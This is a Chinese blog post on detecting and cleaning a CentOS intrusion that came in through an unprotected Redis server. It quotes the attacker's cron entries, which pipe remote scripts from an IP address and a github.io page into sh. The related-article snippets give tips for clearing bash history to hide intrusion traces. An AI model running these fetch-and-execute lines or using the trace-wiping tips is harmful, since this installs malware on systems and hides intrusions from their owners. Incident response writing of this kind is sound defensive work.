今天早上来,网站打不开。通过xshell打不开终端,很久才打开。发现内存占用率高达95%,loadavg 15  16  16

现状:

  1. 负载太高     15        15            16
  2. 网站打不开,shell进去缓慢,执行明令响应太慢

分析:

记得缓存用的是reids3.07(有漏洞,对IP过滤不严谨导致的),需要绑定IP即可

解决:

redis.conf

bind 127.0.0.1 10.104.0.10

./redis-server ../redis.conf &

./redis-cli

flushdb    ###清空缓存

邮件

/var/spool/mail/root

From: root@VM_178_10_centos.localdomain (Cron Daemon)
To: root@VM_178_10_centos.localdomain
Subject: Cron <root@VM_178_10_centos> /usr/bin/curl  -fsSL http://137.59.18.134:7777/setup.sh | sh

可以确定主机被入侵了!在邮件中发现每隔1min执行一次下载脚本的动作

定时任务

crontab -l    ###发现定时任务不正常,不停地刷乱码

/var/spool/cron/root

REDIS0006�     ###redis漏洞,入侵记录

/var/spool/cron/crontabs/root

REDIS0006  .....

*/2 * * * * curl https://zcsgogogogo.github.io/1|/bin/sh           ###痕迹

cpu/mem使用率

free -m

[root@centos ~]# free -m
                    total       used       free     shared    buffers     cached
Mem:          3830       3361        469          0        207       1070
-/+ buffers/cache:       2084       1746
Swap:            0          0          0

cat  /proc/loadavg

[root@centos ~]# cat    /proc/loadavg
0.00 0.00 0.00 1/587 22099     ###在入侵之前都是15+的

top

查看占用CPU最高的程序

xxx5555

kill   -9  pid

追踪到/tmp目录

###后门、病毒文件,

xxx555

redif

wgsp

逐一在进程中查找,杀掉 kill -9 pid

rm -rf   /tmp/*    ###清空临时目录文件

查杀:

再次crontab -l  ,仍然发现再继续刷乱码,说明问题没有根本性解决

ps -ef | grep sh

发现     .sshd可以进程    /usr/bin/.sshd   ### 一般bin目录下没有.xxx的可执行文件

kill  -9 pid

crontab -r

OK,问题解决了

load average: 0.00, 0.00, 0.00  ###降下来了

 总结-Linux入侵后的检测修复

  1. 查看占用CPU和内存最高的进程
  2. 查看定时任务crontab
  3. 查看mail和日志

Centos6.5入侵清理的更多相关文章

  1. centos6系列更换阿里yum源

    1.首先备份原来的cent os官方yum源 cp /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/CentOS-Base.repo.bak 2. ...

  2. Linux运维四:文件属性及文件权限

    一:文件属性 我们使用ls -lhi命令来查看文件时,会列出一堆的文件属性,如: [root@Gin day7]# ll -hi total 7.8M 260674 -rw-r--r-- 1 root ...

  3. Centos更换yum源,安装ssh server

    先连上网,然后更换yum源 1. 新建的用户没有sudo权限,所以首先切换到root用户su -输入密码 2. 备份之前的yum源mv /etc/yum.repos.d/CentOS-Base.rep ...

  4. centons6升级gcc和glibc版本

    一.先升级gcc 这里配置yum源来升级 centos6系列更换阿里yum源 1.首先备份原来的cent os官方yum源 cp /etc/yum.repos.d/CentOS-Base.repo / ...

  5. centos6-增加阿里yum源

    1.获取阿里的yum源覆盖本地官方yum源 wget -O /etc/yum.repos.d/CentOS-ali.repo http://mirrors.aliyun.com/repo/Centos ...

  6. 97、配置yum源仓库服务器

    (服务端(双(外,内)网卡)--客户端(内网)) YUM主要用于自动安装.升级rpm软件包,它能自动查找并解决rpm包之间的依赖关系.要成功的使用YUM工具安装更新软件或系统, 就需要有一个包含各种r ...

  7. linux入侵控制与痕迹清理

    后门 (1)开机自动反弹shell (2)linux后门 Rookit 目前常用的有:t0rn /mafix/enyelkm 等 mafix rootkit Mafix是一款常用的轻量应用级别Root ...

  8. Linux 入侵痕迹清理技巧

    清除history历史命令记录 vim ~/.bash_history //编辑history记录文件,删除部分不想被保存的历史命令 history -c //清除当前用户的history命令记录 H ...

  9. WINDOWS之入侵痕迹清理总结

    Windows的日志文件通常有应用程序日志,安全日志.系统日志.DNS服务器日志.FTP日志.WWW日志等等. 应用程序日志文件:%systemroot%\system32\config\AppEve ...

随机推荐

  1. wampserver安装配置

    按步骤安装--选择指定浏览器-安装成功后显示绿色图标: 打开浏览器:将文件夹移入wampserver安装路径的www文件夹中:找到电脑IP 在手机端访问 IP/文件夹/demo.html即可

  2. iOS 事件传递响应链

    iOS中加载的时候会先执行main函数 int main(int argc, char * argv[]) { @autoreleasepool { return UIApplicationMain( ...

  3. Intent(一.显示使用intent)

    大家都知道如果手机只有一个活动的应用,那这个应用也太简单了吧.如同网页一下,是有多个组成的,在C#中我们可以使用各程skip控件或代码,这里不再赘述.那么我们还是在当前的项目中创建一个名为Second ...

  4. iOS 学习 - 21 系统自带解析 XML

    准备工作: new -> file -> other -> Empty ,在 Save As: 中随便起个名字后缀为 .xml 拷贝下面 <person> <stu ...

  5. ImageView的ScaleType属性

    ImageView的ScaleType各种值代表的意义: CENTER:不进行任何缩放,将图片放在容器中间 CENTER_CROP:如果图片长宽都大于等于容器长宽,则图片不缩放,否则按固定长宽比缩放, ...

  6. mysqldump 备份命令使用中的一些经验总结

    mysqldump的一个小坑(自测) 正文:经常使用接触mysql复制功能的朋友应该对mysqldump命令不陌生吧,鄙人最近也在研究学习这一块的内容,经过几天的测试,发现mysqldump使用中容易 ...

  7. (转)tomcat进程意外退出的问题分析

    节前某个部门的测试环境反馈tomcat会意外退出,我们到实际环境排查后发现不是jvm crash,日志里有进程销毁的记录,从pause到destory的整个过程: org.apache.coyote. ...

  8. 原生js事件的添加和删除

    在IE浏览器中添加或删除事件用attachEvent.detachEvent.在其他标准浏览器中则用addEventListener.removeEventListener.下面的对事件的添加和删除做 ...

  9. #ifndef _LED_H #endif啥意思?

    #ifndef _LED_H#ifndef _LED_H ...... ...... #endif 避免重复引用头文件的内容.

  10. 【转】What is an SDET

    What is an SDET? SDET stands for Software Development Engineer in Test (or Software Design Engineer ...